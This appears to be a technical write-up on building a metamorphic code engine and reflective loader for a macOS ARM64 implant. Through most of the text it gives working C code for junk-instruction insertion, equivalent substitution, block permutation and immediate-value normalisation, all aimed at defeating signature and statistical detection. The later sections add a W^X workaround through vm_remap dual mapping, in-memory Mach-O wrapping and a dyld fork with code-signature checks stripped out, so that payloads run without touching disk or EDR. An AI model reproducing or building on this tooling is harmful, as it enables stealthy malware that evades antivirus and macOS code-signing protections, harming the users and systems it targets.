Every mutation decision flows through liveness. The mutate_ctx_t struct carries the full analysis state:

typedef struct {
    const arm64_inst_t *insns;
    const inst_live_t  *live;
    const slot_live_t  *slive;
    const bool         *loop_body;
    int                 n;
    int                 idx;
    aether_rng_t       *rng;
} mutate_ctx_t;

Junk insertion calls dead_regs() to find available registers, checks whether flag-clobbering variants are allowed, and consults loop_body to further restrict the dead set inside loops. Equivalent substitution to find scratch registers for multi-instruction expansions. Block permutation uses liveness_full() to verify that reordering doesn’t break inter-block register dependencies.

The entire mutation engine is, at its core, a consumer of liveness information. Without it, you’re guessing. With it, you have a proof that every transformation preserves semantics.

Mutation Tricks

Everything up to this point the disassembler, the liveness analyzer, the Mach-O parser exists to serve these transforms. Each one changes the binary’s appearance while preserving its behavior. Stack them across N-generations and the output shares nothing with the input at the byte level.

The simplest transform shove instructions into the code stream that do nothing really. The trick is making them look real.

The engine has two modes. Dead-register junk writes to registers nobody cares about. Live-read junk reads registers that are actually in use but writes the result to a dead register making it look like genuine computation to any analyzer.

Dead-register junk picks from the dead set and generates arithmetic, logical, or move operations:

uint32_t gen_junk(mutate_ctx_t *ctx) {
    int i = ctx->idx;
    regset_t dead = dead_regs(ctx->live, i);

    /* Inside a loop exclude loop-live regs */
    if (ctx->loop_body && ctx->loop_body[i]) {
        regset_t ll = loop_live_regs(ctx->insns, ctx->live, ctx->n,
                                      ctx->loop_body, i);
        dead &= ~ll;
    }

    bool fl_dead = flags_are_dead(ctx->live, i);
    uint8_t d1 = pick_dead(ctx, dead);
    if (d1 == 0xFF) return 0xD503201F; /* nop */

    uint8_t d2 = pick_dead(ctx, dead & ~REG_BIT(d1));
    /* ... more shii ... */
}

The selection matrix depends on what’s available. Two dead registers and dead flags gives you the widest variety 12 different instruction forms including ADDS, SUBS, ANDS, MUL, shifts, and moves. One dead register with live flags restricts you to non-flag-setting variants like ADD, SUB, MOVZ, and MOV. The engine picks randomly from whatever’s legal at that point.

Live-read junk is more interesting. It picks a register that’s actually carrying a live value and uses it as a source operand, writing the result to a dead register:

uint32_t gen_live_junk(mutate_ctx_t *ctx) {
    /* ... */
    regset_t live_regs = ctx->live[i].live_out & 0x1FFFFFFFu;
    uint8_t lr = /* random live register */;
    uint8_t d = /* random dead register */;

    switch (rng(ctx) % 10) {
    case 0: return enc_add_imm(d, lr, imm, sf);   /* ADD dead, live, #imm */
    case 1: return enc_sub_imm(d, lr, imm, sf);   /* SUB dead, live, #imm */
    case 2: return enc_orr_reg(d, lr, lr, sf);     /* ORR dead, live, live */
    case 3: return enc_and_reg(d, lr, lr, sf);     /* AND dead, live, live */
    /* ... more ... */
    }
}

To a disassembler ADD X11, X3, #7 looks like it’s computing something with X3. And X3 is carrying a real value. The instruction just happens to write to X11, which nobody reads afterward. There’s no way to distinguish this from real code without doing your own liveness analysis on the mutated binary.

Before:
0x00: STP  X29, X30, [SP, #-16]!
0x04: MOV  X29, SP
0x08: MOV  X8, X0
0x0c: LDR  X9, [X8, #16]
0x10: ADD  X10, X9, #1
0x14: CMP  X10, #100
0x18: B.GE #24
0x1c: STR  X10, [X8, #16]
0x20: MOV  X0, #1
0x24: LDP  X29, X30, [SP], #16
0x28: RET

After (generation 1, expand):
0x00: STP  X29, X30, [SP, #-16]!
0x04: MOV  X29, SP
0x08: ORR  X11, X29, X29          ; junk: live-read X29, write dead X11
0x0c: MOV  X8, X0
0x10: SUB  X3, X8, #12            ; junk: live-read X8, write dead X3
0x14: LDR  X9, [X8, #16]
0x18: ADD  X10, X9, #1
0x1c: ADD  X5, X9, #63            ; junk: live-read X9, write dead X5
0x20: CMP  X10, #100
0x24: B.GE #28
0x28: MOVZ X14, #0x8              ; junk: write dead X14
0x2c: STR  X10, [X8, #16]
0x30: MOV  X0, #1
0x34: LDP  X29, X30, [SP], #16
0x38: RET

The original 11 instructions became 15. Four junk instructions inserted, each provably safe via liveness. The live-read variants (X29, X8, X9 as sources) are indistinguishable from real computation without dataflow analysis.

Equivalent Substitution

Replace an instruction with a different instruction (or sequence) that produces the same result. The semantics are identical the encoding is completely different.

The engine handles the common cases moves, adds, subtracts, compares, and immediate loads:

int equiv_subst(mutate_ctx_t *ctx, uint32_t *out) {
    const arm64_inst_t *inst = &ctx->insns[ctx->idx];
    bool fl = flags_are_dead(ctx->live, ctx->idx);
    uint8_t scratch = pick_dead(ctx, dead_regs(ctx->live, ctx->idx));
    uint32_t r = rng(ctx);

    switch (inst->op) {

    case ARM_OP_MOV_REG: {
        uint8_t d = inst->rd, m = inst->rm;
        bool sf = inst->is_64bit;
        switch (r % 3) {
        case 0: out[0] = enc_add_imm(d, m, 0, sf); return 1;
        case 1: out[0] = enc_eor_reg(d, m, 31, sf); return 1;
        case 2:
            if (scratch != 0xFF) {
                out[0] = enc_orr_reg(scratch, 31, m, sf);
                out[1] = enc_orr_reg(d, 31, scratch, sf);
                return 2;
            }
            out[0] = enc_add_imm(d, m, 0, sf);
            return 1;
        }
    }

    case ARM_OP_ADD:
        if (!inst->sets_flags && inst->imm > 0 && inst->imm <= 0xFFF) {
            uint16_t imm = (uint16_t)inst->imm;
            switch (r % 3) {
            case 0: /* MOVZ scratch, #imm; ADD Xd, Xn, scratch */
                if (scratch != 0xFF) {
                    out[0] = enc_movz(scratch, imm, sf);
                    out[1] = enc_add_reg(d, n, scratch, sf);
                    return 2;
                }
                return 0;
            case 2: /* Split: ADD Xd,Xn,#a; ADD Xd,Xd,#b where a+b=imm */
                if (imm >= 2) {
                    uint16_t a = (rng(ctx) % (imm - 1)) + 1;
                    out[0] = enc_add_imm(d, n, a, sf);
                    out[1] = enc_add_imm(d, d, imm - a, sf);
                    return 2;
                }
            }
        }
        break;

    case ARM_OP_MOV_IMM: {
        uint64_t inv = (~(uint64_t)inst->imm) & mask;
        if (inv <= 0xFFFF) {
            out[0] = enc_movn(d, (uint16_t)inv, sf);
            return 1;
        }
        if (uval <= 0xFFF && fl) {
            out[0] = enc_eor_reg(d, d, d, sf);   /* zero via XOR */
            out[1] = enc_add_imm(d, d, uval, sf); /* then add */
            return 2;
        }
    }
    /* ... CMP, SUB, SUBS cases ... */
    }
}

Every substitution is gated on liveness. The 2-instruction expansions need a scratch register pick_dead() finds one from the dead set. If no scratch is available, the engine falls back to 1-for-1 replacements or skips the substitution entirely. The ADD split is particularly nice: ADD X5, X3, #100 becomes ADD X5, X3, #37; ADD X5, X5, #63 with a random partition each time. Same result, different immediate values, different instruction count.

Before:
0x1000: MOV  X5, X3              ;  ORR X5, XZR, X3
0x1004: ADD  X6, X5, #100
0x1008: MOV  X0, #0xFF
0x100c: CMP  X6, #200


After (generation 1):
0x1000: ADD  X5, X3, #0          ; MOV > ADD with zero immediate
0x1004: MOVZ X11, #100           
0x1008: ADD  X6, X5, X11         ;   Then register-form ADD
0x100c: MOVN X0, #0xFF00       
0x1010: SUBS XZR, X6, X11        ; CMP > explicit SUBS with scratch


After (generation 2, mutating generation 1's):
0x1000: EOR  X5, X3, XZR        
0x1004: MOVZ X14, #100          
0x1008: ADD  X6, X5, X14        
0x100c: EOR  X0, X0, X0          ; MOVN > XOR-zero
0x1010: ADD  X0, X0, #0xFF      
0x1014: MOVZ X11, #200           
0x1018: SUBS XZR, X6, X11        ; then register-form SUBS

Four instructions became five, then seven. Each generation compounds the previous one’s substitutions. The original MOV X5, X3 has been through two transformations and is now EOR X5, X3, XZR a completely different opcode with the same semantics. A signature that matched ORR Xd, XZR, Xm at generation 0 sees nothing recognizable by generation 2.

The key constraint is the can_grow flag in the code. During expand generations (odd), multi-instruction substitutions are allowed and code grows. During reshape generations (even), only 1-for-1 replacements are permitted the code changes shape without changing size. This is the ol’ school style alternating strategy that prevents unbounded growth while still producing infinite unique generations.

Block Reordering

So you got the local window reordering (swap individual instructions within a small window) and global block permutation (shuffle entire basic blocks with branch fixups).

Window Reordering

Two instructions can swap positions if there are no data dependencies between them. The dependency check is thorough it covers all three hazard types from classical pipeline theory:

bool can_reorder(const arm64_inst_t *insns, const inst_live_t *live, int a, int b) {
    const arm64_inst_t *ia = &insns[a], *ib = &insns[b];

    if (ia->is_control_flow || ib->is_control_flow) return false;
    if (ia->is_privileged || ib->is_privileged) return false;
    if (!ia->valid || !ib->valid) return false;

    /* Memory alias analysis */
    if (ia->addr_mode && ib->addr_mode) {
        /* Pre/post-index modify base - never reorder */
        if (ia->addr_mode == ADDR_PRE_INDEX || ia->addr_mode == ADDR_POST_INDEX) return false;
        if (ib->addr_mode == ADDR_PRE_INDEX || ib->addr_mode == ADDR_POST_INDEX) return false;
        if (!mem_is_store(ia) && !mem_is_store(ib)) goto check_regs;
        /* Same base + non-overlapping offsets: safe */
        if (ia->rn == ib->rn && ia->addr_mode == ADDR_OFFSET && ib->addr_mode == ADDR_OFFSET) {
            int64_t a_hi = ia->imm + ia->access_size;
            int64_t b_hi = ib->imm + ib->access_size;
            if (a_hi <= ib->imm || b_hi <= ia->imm) goto check_regs;
        }
        return false; /* conservative: assume aliasing */
    }

check_regs:
    /* RAW: A writes, B reads same register */
    /* WAW: A writes, B writes same register */
    /* WAR: A reads, B writes same register */
    for (int i = 0; i < ia->num_regs_written; i++) {
        uint8_t wr = ia->regs_written[i];
        for (int j = 0; j < ib->num_regs_read; j++)
            if (wr == ib->regs_read[j]) return false;
        for (int j = 0; j < ib->num_regs_written; j++)
            if (wr == ib->regs_written[j]) return false;
    }
    for (int i = 0; i < ia->num_regs_read; i++)
        for (int j = 0; j < ib->num_regs_written; j++)
            if (ia->regs_read[i] == ib->regs_written[j]) return false;

    /* Flag dependencies */
    if (ia->sets_flags && ib->reads_flags) return false;
    if (ia->reads_flags && ib->sets_flags) return false;
    if (ia->sets_flags && ib->sets_flags) return false;

    return true;
}

RAW (Read-After-Write): instruction B reads a register that A writes. Swapping them means B reads the old value instead of A’s result. Broken. WAW (Write-After-Write): both write the same register. Swapping changes which value survives. Broken. WAR (Write-After-Read): B writes a register that A reads. Swapping means A reads B’s value instead of the original. Broken.

If none of these hazards exist, the two instructions are independent and can execute in either order. The memory alias analysis adds another layer two stores to the same address can’t be reordered, but two loads can, and a load and store to provably different offsets can.

The window reorderer applies this pairwise across small windows:

int reorder_window(arm64_inst_t *insns, const inst_live_t *live,
                   int start, int end, aether_rng_t *rng) {
    int n = end - start;
    int swaps = 0;
    for (int trial = 0; trial < n * 2; trial++) {
        int i = start + aether_rand_n(rng, n);
        int j = start + aether_rand_n(rng, n);
        if (i == j) continue;

        /* Verify all intermediate instructions are also independent */
        int lo = i < j ? i : j, hi = i < j ? j : i;
        bool safe = true;
        for (int k = lo + 1; k < hi && safe; k++) {
            if (!can_reorder(insns, live, lo, k)) safe = false;
            if (!can_reorder(insns, live, k, hi)) safe = false;
        }
        if (safe && can_reorder(insns, live, i, j)) {
            arm64_inst_t tmp = insns[i];
            insns[i] = insns[j];
            insns[j] = tmp;
            swaps++;
        }
    }
    return swaps;
}

It picks random pairs and checks if swapping is cool not just between the two endpoints, but against every instruction in between. After each swap, liveness is recomputed for the window so subsequent swaps see accurate data, it’s very simple and kinda weak but …

Before:
0x00: MOV  X8, X0           ; [1] save argument
0x04: LDR  X9, [X8, #16]    ; [2] load field (depends on [1])
0x08: ADD  X10, X9, #1      ; [3] increment (depends on [2])
0x0c: MOVZ X14, #0x8        ; [4] junk (independent)
0x10: CMP  X10, #100        ; [5] compare (depends on [3])


After reordering:
0x00: MOV  X8, X0           ; [1] can't move - [2] depends on it
0x04: MOVZ X14, #0x8        ; [4] moved up - independent of [2]
0x08: LDR  X9, [X8, #16]    ; [2] shifted down one slot
0x0c: ADD  X10, X9, #1      ; [3] still after [2]
0x10: CMP  X10, #100        ; [5] still after [3]

Instruction [4] was independent of everything between [1] and [5], so it floated up. The dependency chain [1]>[2]>[3]>[5] stayed in order. The code does the same thing, but the instruction sequence is different. Combined with junk insertion, the reordering interleaves real and fake instructions in unpredictable ways make sens ?

Then block permutation which operates at a higher level. It identifies basic blocks within each function, shuffles their order, and inserts unconditional branches (trampolines) to maintain the original control flow:

size_t permute_blocks(const arm64_inst_t *insns, int n, uint32_t *out,
                      size_t out_max, aether_rng_t *rng) {
    /* Find  */
    /* Build  */
    /* &Shuffle  */
    for (int i = nb - 1; i > 1; i--) {
        int j = 1 + aether_rand_n(rng, i);
        int t = order[i]; order[i] = order[j]; order[j] = t;
    }
}

The entry block (block 0) always stays first it’s where execution begins. Everything else gets shuffled. When a block originally fell through to the next block but that block is now somewhere else, the engine inserts a B trampoline to bridge the gap. All branch displacements B, B.cond, CBZ, CBNZ, TBZ, TBNZ are recalculated against the new layout.

Before (3 blocks, linear):
Block 0 (entry):
  0x00: CMP  X0, #10
  0x04: B.GE block2          > 0x14

Block 1 (fallthrough):
  0x08: ADD  X0, X0, #1
  0x0c: STR  X0, [X1]
  0x10: B    block2           > 0x14

Block 2 (exit):
  0x14: MOV  X0, #0
  0x18: RET


After permutation (block order: 0, 2, 1):
Block 0 (entry):
  0x00: CMP  X0, #10
  0x04: B.GE block2          > 0x0c  (retargeted)
  0x08: B    block1           > 0x14  (trampoline inserted)

Block 2 (moved up):
  0x0c: MOV  X0, #0
  0x10: RET

Block 1 (moved down):
  0x14: ADD  X0, X0, #1
  0x18: STR  X0, [X1]
  0x1c: B    block2           > 0x0c  (retargeted)

The control flow is identical. The block layout is completely different. A linear scan of the binary sees CMP, B.GE, B, MOV, RET, ADD, STR, B the “exit” code appears before the “work” code. Every permutation produces a different layout, and with N blocks the number of possible orderings is (N-1)!.

We careful about function boundaries. detects ‘em via RET/RETAA instructions and only permutes blocks within a single function. Cross-function permutation would break stack frames and callee-saved register invariants.

Entropy

This is the subtlest problem. Every technique above changes the code, but if the changes are statistically distinguishable from real compiler output, a scanner catches you without ever looking at individual instructions.

The issue is immediate values. A real compiler generates code with heavily biased immediates. Structure field offsets cluster around small multiples of 8. Boolean checks use 0 and 1. Array bounds are small constants. The distribution is not uniform it’s sharply skewed toward small values.

Naive junk generation picks random 12-bit or 16-bit immediates. A MOVZ X11, #0xB7A3 stands out because real code almost never loads arbitrary 16-bit values into registers.

So ? we normalizes its immediate distribution to match real compiler output:

uint32_t r = rng(ctx);
uint16_t small_imm;
if ((r & 0xF) < 9)       small_imm = rng(ctx) & 0xFF;        /* 56% byte-sized */
else if ((r & 0xF) < 13) small_imm = rng(ctx) & 0x3F;        /* 25% 6-bit (struct offsets) */
else                      small_imm = (rng(ctx) & 0x7) * 8;   /* 19% aligned small */

56% of generated immediates are byte-sized (0–255). 25% are 6-bit values (0–63), matching common structure field offsets. 19% or so are small aligned values (0, 8, 16, 24, 32, 40, 48, 56) the kind you see in stack frame setup and array indexing. No random 16-bit values. No large constants that don’t appear in real code.

The same logic applies to shift amounts:

uint8_t shift = (rng(ctx) % 3) + 1; /* 1-3, not 1-63 */

Real code shifts by 1, 2, or 3 positions in the vast majority of cases. A LSL X11, X3, #47 is a red flag. LSL X11, X3, #2 looks like an array index calculation.

What this looks like in practice:

Naive junk (detectable):
MOVZ X11, #0xB7A3          
ADD  X5, X3, #0xD42        
LSL  X14, X8, #47           ; Compilers don't do this
SUBS X7, X2, #0xF91         


Entropy-normalized junk (blends in):
MOVZ X11, #0x8              
ADD  X5, X3, #24            ; typical stack/struct access
LSL  X14, X8, #2            ; looks array index (sizeof(int))
SUBS X7, X2, #0x30          

Both are equally meaningless they write to dead registers either way. But the second set is invisible to statistical analysis The immediate values fall within the expected distribution for compiler-generated ARM64 code. A scanner computing Shannon entropy or chi-squared statistics over the immediate operand space sees nothing anomalous.

This is still not perfect Twe just kinda profiles a generic compiler output distribution, not the specific binary it’s mutating. A more sophisticated move would sample the actual immediate distribution from the host binary’s real instructions and match it exactly. That’s a something for another day maybe but the current one is good enough.

Reflective Loading

Everything up to this point has been preparation. The metamorphic engine produces mutated code. The liveness analyzer ensures mutations are semantically correct. The equivalent substitution, junk insertion, and reordering passes make each generation look different.

But none of that matters if the result hits disk. The moment you write a file, you create an artifact a hash, a code signature check, a Gatekeeper quarantine flag, a spotlight index entry. The entire point of in-memory mutation is defeated by a single write() syscall.

Piece reflective loader solves this. Mutated code goes from a byte buffer in the heap to executable memory without ever touching the filesystem. mutate > wrap in Mach-O > load into memory > execute no dlopen() of a path, no disk writes that cause if we change even a single byte at runtime, the code signature breaks, and macOS will refuse to run that binary because its signature is invalid. Code signing is a huge part of macOS security, so this is important.

W^X

macOS enforces Write XOR Execute. A memory page can be writable or executable, but not both simultaneously. This is enforced at the hardware level on Apple Silicon via the page table entries the kernel’s or vm_map_protect() in XNU (osfmk/vm/vm_map.c) will reject attempts to set VM_PROT_WRITE | VM_PROT_EXECUTE on the same mapping unless the process has specific entitlements (like com.apple.security.cs.allow-jit, which only debuggers and JIT engines get).

This creates a problem. You need to write mutated code into memory (requires VM_PROT_WRITE), then execute it (requires VM_PROT_EXECUTE). The naive approach allocate writable, copy code, flip to executable works but creates a window where the page transitions are visible. More importantly, on hardened runtimes, vm_protect() from W to X on a page that was previously writable may be denied entirely.

Solve this ? create two virtual address ranges that point to the same physical pages. One mapping is RW (for writing), the other is RX (for execution). You write through the RW mapping, execute through the RX mapping. At no point does any single virtual address have both W and X permissions.

This is not a hack it’s how Apple’s own JIT works in JavaScriptCore The vm_remap() Mach trap creates a second virtual mapping of existing physical pages. It’s defined in osfmk/vm/vm_user.c in the XNU source and exposed through <mach/vm_map.h>.

inmem_binary_t *inmem_load(integrated_code_t *ic, macho_file_t *mf) {
    if (!ic || !mf) return NULL;

    inmem_binary_t *ib = calloc(1, sizeof(inmem_binary_t));
    if (!ib) return NULL;

    /* Calculate total VM size from segment layout */
    uint64_t min_addr = UINT64_MAX, max_addr = 0;
    for (int i = 0; i < mf->num_segments; i++) {
        if (mf->segments[i].vmsize == 0) continue;
        if (mf->segments[i].vmaddr < min_addr) min_addr = mf->segments[i].vmaddr;
        if (mf->segments[i].vmaddr + mf->segments[i].vmsize > max_addr)
            max_addr = mf->segments[i].vmaddr + mf->segments[i].vmsize;
    }
    ib->size = ((max_addr - min_addr) + 0xFFF) & ~0xFFF;

    vm_address_t rw_addr = 0;
    kern_return_t kr = vm_allocate(mach_task_self(), &rw_addr, ib->size, VM_FLAGS_ANYWHERE);
    if (kr != KERN_SUCCESS) { free(ib); return NULL; }

    vm_protect(mach_task_self(), rw_addr, ib->size, FALSE, VM_PROT_READ | VM_PROT_WRITE);

    vm_address_t rx_addr = 0;
    vm_prot_t cur, max;
    kr = vm_remap(mach_task_self(), &rx_addr, ib->size, 0,
                  VM_FLAGS_ANYWHERE | VM_FLAGS_RETURN_DATA_ADDR,
                  mach_task_self(), rw_addr, FALSE,
                  &cur, &max, VM_INHERIT_NONE);

Walk through the vm_remap arguments. mach_task_self() is both the target and source task we’re remapping within our own address space. rx_addr is an output parameter meanin’ the kernel picks the address (VM_FLAGS_ANYWHERE). rw_addr is the source the pages we already allocated. The FALSE for copy is critical so “don’t copy the pages, share them.” Both virtual addresses now point to the same physical frames.

VM_FLAGS_RETURN_DATA_ADDR tells the kernel to return the address of the data pages rather than the beginning of the named entry. This matters on Apple Silicon where the kernel may insert guard pages.

After that a simple

    if (kr == KERN_SUCCESS) {
        vm_protect(mach_task_self(), rx_addr, ib->size, FALSE,
                   VM_PROT_READ | VM_PROT_EXECUTE);

        /* Copy segments through the RW mapping */
        for (int i = 0; i < mf->num_segments; i++) {
            if (mf->segments[i].filesize == 0) continue;
            uint64_t offset = mf->segments[i].vmaddr - min_addr;
            if (offset + mf->segments[i].filesize <= ib->size) {
                if (mf->text_segment &&
                    mf->segments[i].vmaddr == mf->text_segment->vmaddr) {
                    memcpy((uint8_t*)rw_addr + offset, ic->code, ic->size);
                } else {
                    memcpy((uint8_t*)rw_addr + offset,
                           mf->data + mf->segments[i].fileoff,
                           mf->segments[i].filesize);
                }
            }
        }

        ib->base_addr = (void*)rx_addr;   /* execute from here */
        ib->rw_addr   = (void*)rw_addr;   /* write through here */
        ib->dual_mapped = true;
        ib->entry_offset = mf->entry_point;
        return ib;
    }

The memcpy writes go to rw_addr (writable). But because the physical pages are shared, the bytes are immediately visible at rx_addr (executable). No permission flip, no race window, no mprotect dance. The code is written and executable in the same instant.

The __TEXT segment gets special treatment instead of copying from the original Mach-O data, it copies from ic->code, which is the mutated integrated code. Every other segment (if any) comes from the original binary. This is how the mutated code replaces the original while preserving the rest of the binary’s structure.

yep vm_remap can fail Sandboxed processes may not have the mach_vm_remap right. Some MDM profiles restrict it. Hardened runtime with library validation can interfere. When dual-mapping fails, so falls back to single-mapping with a permission flip:

    /* single mapping with W>X transition */
    for (int i = 0; i < mf->num_segments; i++) {
        if (mf->segments[i].filesize == 0) continue;
        uint64_t offset = mf->segments[i].vmaddr - min_addr;
        if (offset + mf->segments[i].filesize <= ib->size) {
            if (mf->text_segment &&
                mf->segments[i].vmaddr == mf->text_segment->vmaddr) {
                memcpy((uint8_t*)rw_addr + offset, ic->code, ic->size);
            } else {
                memcpy((uint8_t*)rw_addr + offset,
                       mf->data + mf->segments[i].fileoff,
                       mf->segments[i].filesize);
            }
        }
    }

    vm_protect(mach_task_self(), rw_addr, ib->size, FALSE,
               VM_PROT_READ | VM_PROT_EXECUTE);

    ib->base_addr = (void*)rw_addr;
    ib->rw_addr   = NULL;
    ib->dual_mapped = false;

Same allocation, same copy, but then a single vm_protect call flips the entire region from RW to RX. This works on most macOS configurations but has two downsides the W>X transition is a detectable event (EDR can hook vm_protect via the ES subsystem), and once flipped to RX, you can’t write to those pages again without another flip. The dual-mapped path keeps the RW mapping alive, so future generations can overwrite the code in-place without any additional syscalls.

The inmem_binary_t struct tracks which path was taken:

typedef struct {
    void *base_addr;      /* RX mapping e from here */
    void *rw_addr;        /* RW mapping w here */
    size_t size;
    uint64_t entry_offset;
    bool dual_mapped;     /* true = vm_remap succeeded */
} inmem_binary_t;

Wrapping Mutated Code in Mach-O

Before loading, the raw mutated bytes need to be wrapped in a valid Mach-O structure. constructs a minimal dylib from scratch no linker involved, no disk I/O, pure in-memory construction:

uint8_t *wrap_macho(const uint8_t *code, size_t code_sz, size_t *out_sz) {
    size_t hdr_sz = sizeof(struct mach_header_64)
                  + sizeof(struct segment_command_64)                              /* __PAGEZERO */
                  + sizeof(struct segment_command_64) + sizeof(struct section_64)  /* __TEXT+__text */
                  + sizeof(struct segment_command_64)                              /* __LINKEDIT */
                  + sizeof(struct symtab_command)
                  + sizeof(struct dysymtab_command)
                  + sizeof(struct dyld_info_command);

    size_t code_off = PG_ALIGN(hdr_sz);
    size_t code_aln = PG_ALIGN(code_sz);
    size_t link_off = code_off + code_aln;
    size_t total    = link_off + PG;

    uint8_t *buf = calloc(1, total);

The layout is the absolute minimum a Mach-O dylib needs to be valid __PAGEZERO (null page trap), __TEXT with a single __text section containing the mutated code, __LINKEDIT with empty symbol/string tables, and the three required load commands (LC_SYMTAB, LC_DYSYMTAB, LC_DYLD_INFO_ONLY). The PG_ALIGN macro rounds up to 16KB page boundaries (0x4000 on Apple Silicon not 4KB like x86).

The header declares it as MH_DYLIB with MH_PIE

MH_NOUNDEFS

MH_DYLDLINK:

    struct mach_header_64 *mh = (void *)buf;
    mh->magic      = MH_MAGIC_64;
    mh->cputype    = CPU_TYPE_ARM64;
    mh->cpusubtype = CPU_SUBTYPE_ARM64_ALL;
    mh->filetype   = MH_DYLIB;
    mh->ncmds      = 6;
    mh->flags      = MH_NOUNDEFS | MH_DYLDLINK | MH_PIE;

MH_DYLIB rather than MH_EXECUTE because the reflective loader treats it as a loadable image, not a standalone executable. MH_NOUNDEFS tells the loader there are no undefined symbols to resolve no external dependencies, no dyld binding needed. MH_PIE enables ASLR-compatible loading at any base address.

The __TEXT segment’s protection is set to VM_PROT_READ

VM_PROT_EXECUTE with no write permission:

    ts->maxprot  = VM_PROT_READ | VM_PROT_EXECUTE;
    ts->initprot = VM_PROT_READ | VM_PROT_EXECUTE;

This matches what a legitimate signed dylib would declare. If anything inspects the Mach-O headers in memory, the protection bits look normal. The actual write access comes through the dual-mapped RW region, which is at a completely different virtual address.

The LC_DYLD_INFO_ONLY command is present but zeroed no bind opcodes, no rebase opcodes, no exports trie. This means the image has no relocations to process, no symbols to resolve, no lazy binding stubs. It’s a self-contained blob of position-independent code. This is possible because the mutation engine already resolved all internal branches before wrapping.

The Userspace dyld

We glossed over custom_dlopen_from_memory earlier. It’s not a thin wrapper It’s a full userspace reimplementation of dyld Apple’s dynamic linker compiled into a static library and linked directly into the implant. The source lives in [ReflectiveLoader/loader/src/](https://github.com/pwardle/ReflectiveLoader/tree/main/loader/src), built via cmake into lib/libloader.a. It’s derived from Apple’s open-source dyld, with all classes moved into the isolator namespace and every code signature check stripped out via #if UNSIGN_TOLERANT guards.

$ ar t lib/libloader.a
__.SYMDEF
ImageLoader.cpp.o
ImageLoaderMachO.cpp.o
ImageLoaderMachOCompressed.cpp.o
ImageLoaderProxy.cpp.o
ObjCRuntime.cpp.o
custom_dlfcn.cpp.o
dyld_stubs.cpp.o

Seven object files. The class hierarchy actually mirrors Apple’s dyld almost exactly ImageLoader is the abstract base ImageLoaderMachO handles segment mapping and load command parsing, ImageLoaderMachOCompressed deals with the LINKEDIT format: bind opcodes, lazy binding, chained fixups, export tries. All of it lives under the isolator namespace to avoid symbol collisions with the real dyld running in the same process.

Compiles all .cpp files in ReflectiveLoader/loader/src/ with -DUNSIGN_TOLERANT=1 and packs them into a static archive:

add_library(${TARGET} STATIC ${SRC} ${HDR})
target_compile_definitions(${TARGET} PRIVATE UNSIGN_TOLERANT=1)
target_compile_options(${TARGET} PRIVATE -fdata-sections -ffunction-sections -fvisibility=hidden)

The UNSIGN_TOLERANT=1 define is the key modification. It gates 37 #ifdef blocks across the codebase every place where Apple’s dyld would validate a code signature, check LC_CODE_SIGNATURE, call csops(), or reject an unsigned binary, the check is compiled out. The -fvisibility=hidden ensures none of the internal isolator:: symbols leak into the final binary’s export table.

$ nm -g lib/libloader.a | c++filt | grep "T _custom_dl"
0000000000001360 T _custom_dlopen_from_memory
0000000000000c4c T _custom_dlopen
0000000000001590 T _custom_dlsym
00000000000019b8 T _custom_dlclose
0000000000000c10 T _custom_dlerror

Five exported C functions a drop-in replacement for <dlfcn.h>. The one that matters is custom_dlopen_from_memory. When quiet_load() calls it with a pointer to the wrapped Mach-O buffer and its length, here’s what happens inside.

The call lands in custom_dlfcn.cpp ([ReflectiveLoader/loader/src/custom_dlfcn.cpp](https://github.com/pwardle/ReflectiveLoader/blob/main/loader/src/custom_dlfcn.cpp#L300)).

extern "C" void *custom_dlopen_from_memory(void *mh, int len) {
    try {
        const char *path = "foobar";

        // Load image step
        auto image = ImageLoaderMachO::instantiateFromMemory(
            path, (macho_header *)mh, len, g_linkContext);

        bool forceLazysBound = true;
        bool preflightOnly = false;
        bool neverUnload = false;

        // Link step
        std::vector<const char *> rpaths;
        ImageLoader::RPathChain loaderRPaths(NULL, &rpaths);
        image->link(g_linkContext, forceLazysBound, preflightOnly,
                    neverUnload, loaderRPaths, path);

        // Register ObjC classes
        registerObjC(static_cast<ImageLoaderMachO *>(image));

        // Initialization of static objects
        ImageLoader::InitializerTimingList initializerTimes[1];
        initializerTimes[0].count = 0;
        image->runInitializers(g_linkContext, initializerTimes[0]);

        return image;
    }
    catch (const char *msg) {
        return with_error("Error: " + std::string(msg));
    }
    catch (...) {
        return with_error("Error: Unknown reason...");
    }
}

Instantiate, link, register ObjC, run initializers. The path is a dummy string there is no file. The g_linkContext is a global ImageLoader::LinkContext structure built by dyld_stubs.cpp with every callback stubbed out. The returned image pointer is an opaque handle that custom_dlsym can later use to resolve symbols.

instantiateFromMemory is where the Mach-O buffer becomes a loaded image. It calls sniffLoadCommands() to validate the header, count segments, locate LC_DYLD_INFO_ONLY or LC_DYLD_CHAINED_FIXUPS, and check for encryption. Then it dispatches to ImageLoaderMachOCompressed:

$ nm -g lib/libloader.a | c++filt | grep "instantiateFromMemory"
00000000000016c4 T isolator::ImageLoaderMachO::instantiateFromMemory(...)
0000000000000844 T isolator::ImageLoaderMachOCompressed::instantiateFromMemory(...)

ImageLoaderMachOCompressed::instantiateFromMemory parses the buffer into an in-memory image. The critical part is mapSegments() the in-memory variant, not the file-descriptor variant. Here’s what Apple’s code does when the source is a memory buffer instead of a file:

// ImageLoaderMachO.cpp   mapSegments (memory variant)
void ImageLoaderMachO::mapSegments(const void* memoryImage, uint64_t imageLen,
                                    const LinkContext& context) {
    intptr_t slide = this->assignSegmentAddresses(context, 0);

    for (unsigned int i = 0, e = segmentCount(); i < e; ++i) {
        vm_address_t loadAddress = segPreferredLoadAddress(i) + slide;
        vm_address_t srcAddr = (uintptr_t)memoryImage + segFileOffset(i);
        vm_size_t size = segFileSize(i);
        kern_return_t r = vm_copy(mach_task_self(), srcAddr, size, loadAddress);
        if (r != KERN_SUCCESS)
            throw "can't map segment";
    }

    this->setSlide(slide);

    // Set final permissions on each segment
    for (unsigned int i = 0, e = segmentCount(); i < e; ++i)
        segProtect(i, context);
}

No mmap, no file descriptor, no filesystem path. assignSegmentAddresses() picks a base address (respecting ASLR), then vm_copy() copies each segment from the in-memory buffer to its final load address. After all segments are placed, segProtect() sets the correct vm_protect permissions r-x for __TEXT, rw- for __DATA, r-- for __LINKEDIT. The file-based mapSegments() variant uses mmap() with MAP_FIXED to map directly from disk; this variant uses vm_copy() because the source is already in our address space.

After mapping, the image goes through the standard dyld link sequence:

$ nm -g lib/libloader.a | c++filt | grep "T isolator::ImageLoader::recursiveRebase\|T isolator::ImageLoader::recursiveBind\|T isolator::ImageLoader::runInitializers\|T isolator::ImageLoader::link"
0000000000002710 T isolator::ImageLoader::recursiveRebase(...)
00000000000029b0 T isolator::ImageLoader::recursiveBind(...)
0000000000001bd4 T isolator::ImageLoader::runInitializers(...)
